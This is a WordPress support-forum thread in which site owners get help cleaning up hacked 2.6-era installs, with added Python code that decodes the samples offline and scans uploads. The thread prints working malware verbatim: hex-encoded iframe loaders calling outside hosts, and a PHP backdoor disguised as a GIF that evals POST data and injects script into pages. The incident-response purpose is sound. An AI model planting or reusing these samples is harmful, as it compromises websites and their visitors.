WordPress.org

malicious script injection on my site (12 posts)

  1. mr_swede
    Member
    Posted 5 years ago #

    For the second time in a few months I've had a malicious script injection in HTML and PHP files on my site. I don't know how it happened, but last time I changed all passwords and reinstalled all files hoping for a solution.

    All wordpress folders and files had and have 755 file permission.

    Below are the scripts injected in the WordPress files. According to my hosting partner (one.com) someone got hold of my passwords, but I've seen that files have been injected after I changed the password to my site. I did not change the password to my wp-admin account last time since I didn't suspect this to be a WordPress break-in, but now I don't know anymore...

    Anyone that can decipher them? I've googled but haven't found a way to do it.
    I also would like someone to advise me on what has happened and what to do to avoid this from happening again.

    wp-includes\class-smtp.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\post.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\query.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E706F726E67616C6C65726965737A2E636F6D2F73742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\feed-rss2-comments.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

  2. mr_swede
    Member
    Posted 5 years ago #

    After some more googling I finally found out how to decipher the scripts above. I'm a total newbie to scripts, so bear with me if my how-to isn't nerdy enough...

    Just replace all document.write(txt) with document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>");

    Thanks to the original author.

    Then save the file as .html and run it in your browser. Make sure that scripts are allowed. Having changed the scripts according to the advice above makes the scripts totally harmless, so you can load the file in IE. I failed to load them in Firefox.

    Now, the scripts above look like this after deciphering:

    class-smtp.html

    This is how the first script looks after making the change described above... just so that you see the change of document.write.

    <html>
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write("<textarea rows=50 cols=50>");document.write(unescape(o));document.write("</textarea>")}</script>
    </html>

    How it looks in IE
    <iframe src="http://www.kun-land.hu/cd/z/static.php" height="2" style="display:none" width="2"></iframe>

    post.html
    This is the iframe hidden in the script.
    <iframe src="http://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    query.html

    IE result:
    <iframe src="http://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe>

    feed-rss2-comments.html

    IE result:
    <iframe src="http://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    I still really need to know how all this happened to me. Anyone out there that can shed some light on this?

    I removed all the files above from my site since I faced Google blacklisting last time this happened. However, now I can't access my site and log in as wp-admin. Anyone who can suggest how I can get back in so that I can upgrade without having to delete everything?
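
An added example, not from any post in this thread: the decoding mr_swede did by hand above, done offline in Python so the injected script is never loaded in a browser at all. The sample script is the class-smtp.php snippet from the first post, copied verbatim; the PHP file wrapper around it and the helper names are constructed for the example.

```python
# Added example (not part of the thread): decode the injected <script>
# blocks statically, without opening them in IE or any other browser.
# The loader turns each hex pair into %XX and hands the result to
# unescape(); hex-decoding the string and reading the bytes as Latin-1
# gives byte-for-byte the same text.
import re

# Constructed sample: the snippet reported for wp-includes\class-smtp.php,
# copied verbatim from the first post (one line there, split here for width).
SAMPLE_SCRIPT = (
    "<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B75"
    "6E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D"
    "223222207374796C653D22646973706C61793A6E6F6E65222077696474683D223222"
    "3E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) "
    "{ var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} "
    "var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 "
    "&& v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>"
)

HEX_PAYLOAD = re.compile(r"var\s+s\s*=\s*'([0-9A-Fa-f]+)'")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc=[\"']([^\"']+)[\"']", re.I)
# The loader only fires for IE user agents that are not 'nt 6.' (Vista/2008).
UA_GATE = ("indexOf('msie')", "indexOf('nt 6.')")


def decode_payload(script_text):
    """Return the HTML the loader would document.write(), or None if the
    block does not carry the hex payload this family uses."""
    m = HEX_PAYLOAD.search(script_text)
    if not m:
        return None
    hexstr = m.group(1)
    if len(hexstr) % 2:
        raise ValueError("odd-length hex payload: %d chars" % len(hexstr))
    return bytes.fromhex(hexstr).decode("latin-1")


def analyse(script_text):
    """Decode one <script> block and pull out what a responder wants:
    the hidden iframe targets and whether the loader is IE-only."""
    decoded = decode_payload(script_text)
    if decoded is None:
        return None
    return {
        "decoded": decoded,
        "iframe_src": IFRAME_SRC.findall(decoded),
        "ie_only": all(marker in script_text for marker in UA_GATE),
    }


def find_injections(file_text):
    """Scan the text of one PHP/HTML file and return the analysis of
    every <script> block that carries a hex payload."""
    hits = []
    for m in SCRIPT_BLOCK.finditer(file_text):
        result = analyse(m.group(0))
        if result is not None:
            hits.append(result)
    return hits


# Constructed sample file: a stub PHP file with the loader appended,
# the way the injected wp-includes files looked.
SAMPLE_FILE = "<?php\n// original file contents\n?>\n" + SAMPLE_SCRIPT + "\n"

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_FILE):
        print(hit["decoded"])
        print("iframe targets:", hit["iframe_src"], "IE only:", hit["ie_only"])
```

Feed each suspect file's text to find_injections() and collect the iframe targets across the whole tree; the user-agent check explains why a non-IE browser shows nothing on the infected pages even though the files are modified.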

  3. whooami
    Member
    Posted 5 years ago #

    All wordpress folders and files had and have 755 file permission.

    judging by this admission, it could be anything.

    not to mention that you didn't mention the version of wordpress this site is running, but you do mention needing to upgrade.

    I suggest reading through the forum, search for hacked.

  4. mr_swede
    Member
    Posted 5 years ago #

    judging by this admission, it could be anything.

    This was just about what my hosting partner one.com told me as well. The problem is that I don't know what has happened and I therefore don't know what to do to avoid this again.

    I'm using version 2.6, and I already have searched the forums - both here and elsewhere - without having found someone else addressing these issues.

  5. whooami
    Member
    Posted 5 years ago #

    well 2.6 is insecure. there's your next problem.

    that's why there's a message that tells you in your admin area to upgrade.

    and these issues are addressed, over and over and over on these forums.

    you want a specific answer based on the content of the files, that's probably not going to happen. An insecure site can be the victim to all sorts of malicious files of varying content.

    I've also, time and time again, explained the right way to clean out a site. if you searched for the word 'hacked' on these forums, chances are you've seen my other posts.

    The result of NOT cleaning a site out properly, and the importance of doing things right the first time, was demonstrated just this evening, within this thread:

    http://wordpress.org/support/topic/206175?replies=20

    10 months .. and that file stayed on this guy's server.

  6. mr_swede
    Member
    Posted 5 years ago #

    and these issues are addressed, over and over and over on these forums.

    Thanks for your patience - I've read many of your answers and I'm impressed by your way of dealing with people like me over and over again.

    One problem of not being a pro is that it's difficult to see patterns when other people address related issues. I - of course stupidly - thought that my issues are unique, which they of course aren't.

    A funny - and scary - thing is that I just logged on to my site, changed all passwords and literally saw files being changed as I was logged on. More scripts were inserted into other wp files.

    I will read through the forums again, change passwords once again, upgrade and hope for the best.

  7. whooami
    Member
    Posted 5 years ago #

    Thanks for your patience

    no worries. it's actually in my best interest to help -- I'm not that altruistic :) hacked websites are bad for all of us.

    what you really have to do is shitcan a good deal of what's on your server, file-wise. if you're uploading files from the admin area, scour all of those directories, for ANYTHING that doesn't look right --

    an image file that has executable permissions, for example.

    anything you dont remember uploading...

    if need be, download everything, and look at it.

    the other thing, is to look in your database. I fixed a site over the weekend -- the owner didn't even know that the site had had a malicious file uploaded to it. I saw it in the posts table; it was an untitled post, with one attachment.. and the attachment was a malicious script that's been mentioned on this forum by name.

    also, while in your database look for any rogue users, in the users table. wordpress <-- you shouldn't have that user.

    the rest is really a matter of cleaning up the filespace, deleting anything you cannot confirm is clean, and starting with fresh files.

    I tell people, when they upgrade that they ought to be deleting files first, and the "leaving old files on the server" problem is one reason why.

    lastly, of course, change your passwords. all of them.

    oh, and fix those permissions. :P
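
An added example, not whooami's code or WordPress's own: a Python triage pass over an uploads directory that implements the file-level checks from the post above (executable bits, "images" that are not images, PHP inside uploads, extensions an uploads tree should not hold). The directory it scans is a constructed sample built by build_demo_tree(); point triage() at a copy of your real wp-content/uploads instead. The extension allowlist and the helper names are the example's own assumptions. The database checks in the post (the rogue user, the untitled post with an attachment) are not covered here.

```python
# Added example (not part of the thread): a first-pass triage of a
# wp-content/uploads tree following the checklist in the post above.
# It reports; it deletes nothing.
import os
import stat
import tempfile

# First bytes a real file of each type starts with.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
PHP_MARKERS = (b"<?php", b"<?=", b"eval(", b"base64_decode(")
# Assumed allowlist for this example; tighten it to what your site uploads.
UPLOAD_ALLOW = set(IMAGE_MAGIC) | {".pdf", ".txt", ".zip", ".mp3"}


def check_file(path):
    """Return the reasons one upload looks wrong (empty list = nothing found)."""
    reasons = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["symlink inside uploads"]
    if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        reasons.append("executable bit set")
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as f:
        data = f.read()
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        reasons.append("extension %s but no %s header" % (ext, ext[1:].upper()))
    # Whole file, not just the header: PHP appended after a valid GIF header
    # still runs if the web server is ever talked into executing the file.
    if any(marker in data for marker in PHP_MARKERS):
        reasons.append("contains PHP code")
    if ext not in UPLOAD_ALLOW:
        reasons.append("unexpected extension %r" % ext)
    return reasons


def triage(uploads_dir):
    """Walk the tree and return [(relative_path, [reasons]), ...], sorted."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(root, name)
            reasons = check_file(path)
            if reasons:
                findings.append((os.path.relpath(path, uploads_dir), reasons))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample tree (not real uploads): one clean GIF, one "GIF"
    that is really PHP like the smilies file reported later in this thread,
    one clean PNG with the exec bit set, and a stray .php file."""
    base = tempfile.mkdtemp(prefix="uploads-")

    def put(rel, data, mode=0o644):
        p = os.path.join(base, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as f:
            f.write(data)
        os.chmod(p, mode)

    put("2008/10/clean.gif", b"GIF89a" + b"\x00" * 32)
    put("2008/10/156.gif", b"<?php if(isset($_POST['c']))eval($_POST['c']); ?>")
    put("2008/11/logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32, 0o755)
    put("2008/11/x.php", b"<?php echo 1; ?>")
    return base


if __name__ == "__main__":
    for rel, reasons in triage(build_demo_tree()):
        print(rel, "->", "; ".join(reasons))
```

Anything it flags goes on the "cannot confirm clean" pile the post describes; the clean way out is still fresh files, not editing the flagged ones in place.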

  8. PatriotG
    Member
    Posted 5 years ago #

    Hello

    We currently run 2.6.2 on our site and it was recently hacked. My host said that it was a PHP injection attack.

    Not sure if this is the case, I have to assume for now that this is the truth.

    We do not run the wp-super-cache plugin, so this was not the vulnerability.

    The initial issue started as follows:

    When you went to the site the main page threw an error similar to this:
    Parse error: syntax error, unexpected '<' in /hsphere/local/home/rfreeman/examplesite.com/wp-includes/post-template.php on line 734

    Our host, I assume, cleaned up the directory.

    When the site was finally back up I found this in the plugin page notice area

    The plugin

    ../../../../../../../../../../../../../../../../../../../../../hsphere/local/home/atomic/atomiccityfourwheelers.com/forum/images/smilies/156.gif has been deactivated due to an error: Invalid plugin.

    No idea what this is, and I can't seem to get rid of it.

    Also

    when i went to the main page,
    Symantec antivirus generated a threat alert for the Bloodhound.exploit.196
    http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2008-080702-2357-99

    I'm posting this as a warning to others, and also was wondering if anyone here has experienced similar problems.

    At this point we are thinking about doing a fresh install of 2.6.3, but I'm wondering if the vulnerability lies elsewhere, plugins, or directory permissions.

    Any response will be appreciated.

  9. whooami
    Member
    Posted 5 years ago #

    http://atomiccityfourwheelers.com/forum/images/smilies/156.gif

    that's not an image.

    it's this:

    <?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

    contact your host, if that's not a domain you have control over. clean up your site, etc, etc ..

  10. whooami
    Member
    Posted 5 years ago #

    fwiw, that looks for other stuff to be 'in place' so if you're seeing an effect from that, chances are you have files in place on your server that have been altered.

    and don't rely on your host to clean up your site, that's not their job, and most don't have a clue what to look for or do. I say that as someone who works for a host.
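
An added example, not from whooami's posts: a Python dissection of the PHP that was sitting in smilies/156.gif, covering the two posts above. It decodes the two base64 constants, runs the next obfuscation layer the injected script applies to itself (JavaScript unescape() followed by a junk-character strip), and lists the capabilities a responder should recognise, including the /tmp stage that post 10 refers to. The base64 constants are copied verbatim from the post; the rest of the sample is an abridged excerpt of the same file with parts of the output handler elided, and the helper names and indicator labels are the example's own.

```python
# Added example (not part of the thread): pull apart the PHP backdoor
# shown above without executing any of it.
import base64
import re

# Copied verbatim from the file in the post (one line there, split for width).
B64_INJECT = (
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+"
    "CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4A"
    "JCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUm"
    "JTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98"
    "JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQl"
    "NkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcy"
    "JTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUz"
    "OCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQl"
    "NjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNF"
    "fiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2"
    "YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo="
)
B64_STRIP_REGEX = (
    "IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJl"
    "Lis/PC9zY3JpcHQ+CiNz"
)

# Abridged excerpt of the posted file; elided parts are marked /* ... */.
SAMPLE_PHP = (
    "<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);"
    "for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('"
    + B64_INJECT +
    "'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))"
    "$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('"
    + B64_STRIP_REGEX +
    "'),'',$s);if(stristr($s,'</body'))/* ... */return $g?gzencode($s):$s;}"
    "function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){/* ... */"
    "ob_start('tmp_lkojfghx');/* ... */}}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')"
    "$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>"
)

B64_CALL = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")
JS_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# The class from the payload's own .replace(/#|\!|\$|~|`|@|\||\&/g,"").
JUNK = re.compile(r"[#!$~`@|&]")


def b64_to_text(b64):
    """Decode one constant; pad first, since forum copies lose trailing '='."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("latin-1")


def decode_constants(php_text):
    """Every base64_decode('...') literal in the PHP, decoded, in order."""
    return [b64_to_text(m) for m in B64_CALL.findall(php_text)]


def js_unescape(s):
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def unescape_then_strip(s):
    """Layer 2: unescape() first, then strip the junk characters, in that
    order (a %24 becomes '$' and is then removed, as in the original)."""
    return JUNK.sub("", js_unescape(s))


def next_layer(injected_script):
    """Take the eval(unescape('...').replace(...)) argument out of the
    decoded <script> and return the JavaScript it would actually eval()."""
    m = re.search(r"unescape\('(.*?)'\)\.replace", injected_script, re.S)
    return unescape_then_strip(m.group(1)) if m else None


# Capabilities visible in the file; labels are the example's own.
INDICATORS = {
    "evals attacker-supplied POST data": r"eval\(\$_POST\[",
    "loads a second stage from /tmp": r"is_file\(\$f='/tmp/",
    "installs an output-buffer callback": r"ob_start\('\w+'\)",
    "rewrites every page before </body": r"</body",
    "handles gzip-compressed output": r"gzinflate\(",
    "hooks the error handler to re-arm": r"set_error_handler\(",
    "hides strings in base64": r"base64_decode\(",
}


def indicators(php_text):
    return {name: re.search(pat, php_text) is not None
            for name, pat in INDICATORS.items()}


if __name__ == "__main__":
    injected, strip_regex = decode_constants(SAMPLE_PHP)
    print("injected block starts:", repr(injected[:64]))
    print("regex used to remove older copies:", repr(strip_regex))
    print("layer 2 JavaScript:", repr(next_layer(injected)))
    for name, hit in indicators(SAMPLE_PHP).items():
        print(("[x] " if hit else "[ ] ") + name)
```

The /tmp stage is the part to remember when cleaning up: deleting the fake GIF alone leaves whatever /tmp/m1..m99 it was loading, and the error-handler hook means the injection keeps re-installing itself on any PHP warning until every altered file is gone.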

  11. PatriotG
    Member
    Posted 5 years ago #

    Thanks.

    Our host went in there and started the cleanup on their own.
    We are going to do a fresh install of 2.6.3

    We are running the XDFORUM plugin, and that is still not functioning properly.

    My hope with this post was to find where the vulnerability was, in a plugin or elsewhere,
    But thanks for the insight.
    PG

  12. whooami
    Member
    Posted 5 years ago #

    ok, well here's the deal though (6 hours later)..

    your host went and cleaned up what -- that image, that's not an image .. that's still there. so your host, they either need that info, or you need a new host.

Topic Closed

This topic has been closed to new replies.
